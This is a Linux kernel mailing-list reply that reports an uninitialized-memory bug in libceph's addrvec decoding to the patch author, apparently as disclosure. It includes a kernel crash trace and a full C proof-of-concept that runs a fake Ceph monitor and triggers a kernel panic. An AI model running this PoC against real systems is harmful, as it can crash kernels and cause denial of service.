Re: [PATCH v3] libceph: tolerate addrvecs with multiple entries of the same type
From: XIAO WU
Date: Sat Jun 20 2026 - 21:29:54 EST
Hi Kefu,
I came across a Sashiko AI code review [1] that flagged a pre-existing
uninitialized memory issue in `ceph_decode_entity_addrvec()`. When the
addrvec has zero entries (`addr_cnt == 0`), the function returns 0
without writing to `*addr`, but callers like `ceph_monmap_decode()`
pass addresses from `kmalloc_flex()` and proceed to use them.
I was able to reproduce this in QEMU by running a fake Ceph monitor that
sends a monmap with an empty addrvec. With `panic_on_warn=1`, the
kernel hits a WARNING in `ceph_con_v1_try_read()` and panics.
On Thu, Jun 11, 2026 at 07:32:51PM +0800, Kefu Chai wrote:
> ceph_decode_entity_addrvec() currently rejects any addrvec containing
> more than one entry that matches the requested msgr type...
Your patch correctly tolerates duplicate entries, but the function still
returns success without touching `*addr` when `addr_cnt == 0`:
```c
// net/ceph/decode.c: ceph_decode_entity_addrvec()
if (!addr_cnt)
return 0; // *addr is still uninitialized
if (addr_cnt == 1 && !memchr_inv(&tmp_addr, 0, sizeof(tmp_addr)))
return 0; // same
```
Callers that pass addresses from dynamic allocation hit stale data:
```c
// net/ceph/mon_client.c: ceph_monmap_decode()
mon_inst = kmalloc_flex(..., num_mon, sizeof(*mon_inst));
// ...
ceph_decode_entity_addrvec(p, end, msgr2, &mon_inst[i].addr);
// mon_inst[i].addr may be uninitialized if addrvec was empty
```
[Reproduction]
I set up a fake Ceph v1 monitor on localhost that sends a monmap
containing a monitor entry with an empty addrvec (addr_cnt=0). Mounting
the Ceph filesystem against it triggers the monmap decode path, causing
the client to attempt a connection with the uninitialized address.
[Crash — kernel 7.1.0-rc6, panic_on_warn=1]
con->v1.connect_seq != le32_to_cpu(con->v1.in_reply.connect_seq)
WARNING: net/ceph/messenger_v1.c:901 at ceph_con_v1_try_read+0x59f7/0x7020
RIP: 0010:ceph_con_v1_try_read+0x59f7/0x7020
Call Trace:
<TASK>
ceph_con_workfn+0xa04/0x13c0
process_one_work+0xa20/0x1c50
worker_thread+0x6df/0xf30
kthread+0x387/0x4a0
ret_from_fork+0xb2c/0xdd0
</TASK>
Kernel panic - not syncing: kernel: panic_on_warn set ...
Full PoC source (poc.c):
---8<----------------------------------------------------------------
/*
* PoC: Uninitialized memory in ceph_decode_entity_addrvec()
* Compile: gcc -static -o poc poc.c
* Run: ./poc [port]
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/mount.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/poll.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <errno.h>
#include <fcntl.h>
#define BANNER "ceph v027"
#define BNR 9
#define ADR 136
#define CBNR (BNR+ADR)
#define SBNR (BNR+2*ADR)
#define TAG_RDY 1
#define TAG_MSG 7
#define MON_MAP 4
#define ENT_MON 1
#define MSZ 16384
typedef uint8_t u8; typedef uint16_t u16;
typedef uint32_t u32; typedef uint64_t u64;
static u32 ct[256];
static int ci;
static void ic(void)
{
u32 i, j, k;
if (ci) return;
for (i = 0; i < 256; i++) {
k = i;
for (j = 0; j < 8; j++)
k = (k >> 1) ^ (k & 1 ? 0x82F63B78 : 0);
ct[i] = k;
}
ci = 1;
}
static u32 crc(u32 c, const u8 *b, int l)
{
while (l--) c = ct[(c ^ *b++) & 0xFF] ^ (c >> 8);
return c;
}
#define W8(b,v) ((b)[0] = (u8)(v))
#define W16(b,v) ((b)[0]=(v)&255,(b)[1]=((v)>>8)&255)
#define W32(b,v) ((b)[0]=(v)&255,(b)[1]=((v)>>8)&255,(b)[2]=((v)>>16)&255,(b)[3]=((v)>>24)&255)
#define W64(b,v) do { int _i; for (_i=0; _i<8; _i++) (b)[_i]=((u64)(v)>>(_i*8))&255; } while(0)
#define REQ_FEAT (1ULL << 23)
static int rcv(int f, u8 *b, int l)
{
while (l > 0) {
struct pollfd p = { .fd = f, .events = POLLIN };
if (poll(&p, 1, 15000) <= 0) return -1;
int n = read(f, b, l);
if (n <= 0) return -1;
b += n; l -= n;
}
return 0;
}
static int snd(int f, u8 *b, int l)
{
while (l > 0) { int n = write(f, b, l); if (n <= 0) return -1; b += n; l -= n; }
return 0;
}
static int ea(u8 *b) { W8(b, 2); W32(b+1, 0); return 5; }
static int pay(u8 *b)
{
int o = 0, bo, so, po, mo, ms;
bo = o; W32(b+o, 0); o += 4;
W8(b+o, 6); o++; W8(b+o, 1); o++;
so = o; W32(b+o, 0); o += 4;
po = o;
W64(b+o, 0x42); o += 8;
W32(b+o, 1); o += 4;
W8(b+o, 1); o++; W8(b+o, 1); o++; W32(b+o, 0); o += 4;
W8(b+o, 1); o++; W8(b+o, 1); o++; W32(b+o, 0); o += 4;
W32(b+o, 1); o += 4;
W32(b+o, 2); o += 4; memcpy(b+o, "m0", 2); o += 2;
W8(b+o, 1); o++; W8(b+o, 1); o++;
mo = o; W32(b+o, 0); o += 4;
ms = o;
W32(b+o, 2); o += 4; memcpy(b+o, "m0", 2); o += 2;
o += ea(b+o);
W32(b+mo, o - ms);
W32(b+so, o - po);
W32(b+bo, o - bo);
return o;
}
#define HS 60
#define FS 13
static int msg(u8 *b, u64 s)
{
int o = 0;
b[o++] = TAG_MSG;
int h = o;
memset(b+o, 0, HS); o += HS;
int pl = pay(b+o); o += pl;
memset(b+o, 0, FS); o += FS;
u8 *hh = b + h;
W64(hh+0, s); W16(hh+16, MON_MAP); W16(hh+18, 127);
W16(hh+20, 1); W32(hh+22, pl); W64(hh+36, ENT_MON);
W64(hh+44, 0); W32(hh+56, crc(0, hh, 56));
return o;
}
static int mon(int pt)
{
int s, c; struct sockaddr_in a; u8 b[MSZ];
ic();
s = socket(AF_INET, SOCK_STREAM, 0);
int o = 1; setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &o, sizeof(o));
memset(&a, 0, sizeof(a)); a.sin_family = AF_INET;
a.sin_addr.s_addr = htonl(INADDR_LOOPBACK); a.sin_port = htons(pt);
bind(s, (void *)&a, sizeof(a)); listen(s, 1);
struct pollfd p = { .fd = s, .events = POLLIN };
if (poll(&p, 1, 60000) <= 0) goto out;
c = accept(s, 0, 0);
if (rcv(c, b, CBNR) < 0) goto done;
{ u8 *p = b; memcpy(p, BANNER, BNR); p += BNR;
memset(p, 0, ADR); p += ADR; memset(p, 0, ADR);
if (snd(c, b, SBNR) < 0) goto done; }
{ int t = 0; while (t < 26) {
struct pollfd p2 = { .fd = c, .events = POLLIN };
if (poll(&p2, 1, 10000) <= 0) goto done;
int n = read(c, b+t, MSZ-t); if (n <= 0) goto done; t += n; } }
memset(b, 0, 26); W8(b, TAG_RDY); W64(b+1, REQ_FEAT);
snd(c, b, 26); usleep(300000);
{ int ml = msg(b, 1); snd(c, b, ml); }
usleep(500000);
{ int ml = msg(b, 2); snd(c, b, ml); }
out:
close(c); close(s); return 0;
done:
close(c); close(s); return -1;
}
int main(int ac, char **av)
{
int pt = 16789; if (ac >= 2) pt = atoi(av[1]);
pid_t pid = fork();
if (pid == 0) { mon(pt); _exit(0); }
usleep(200000);
mkdir("/tmp/mnt", 0700);
char s[64]; snprintf(s, 64, "127.0.0.1:%d:/", pt);
mount(s, "/tmp/mnt", "ceph", 0, "name=admin");
waitpid(pid, 0, 0);
umount2("/tmp/mnt", MNT_FORCE); rmdir("/tmp/mnt");
return 0;
}
---8<----------------------------------------------------------------
Compile: gcc -static -o poc poc.c
[1] https://sashiko.dev/#/patchset/20260611113251.2975975-1-k.chai%40proxmox.com
(Sashiko AI code review — "Uninitialized Memory", Severity: High)
Thanks,
XIAOWU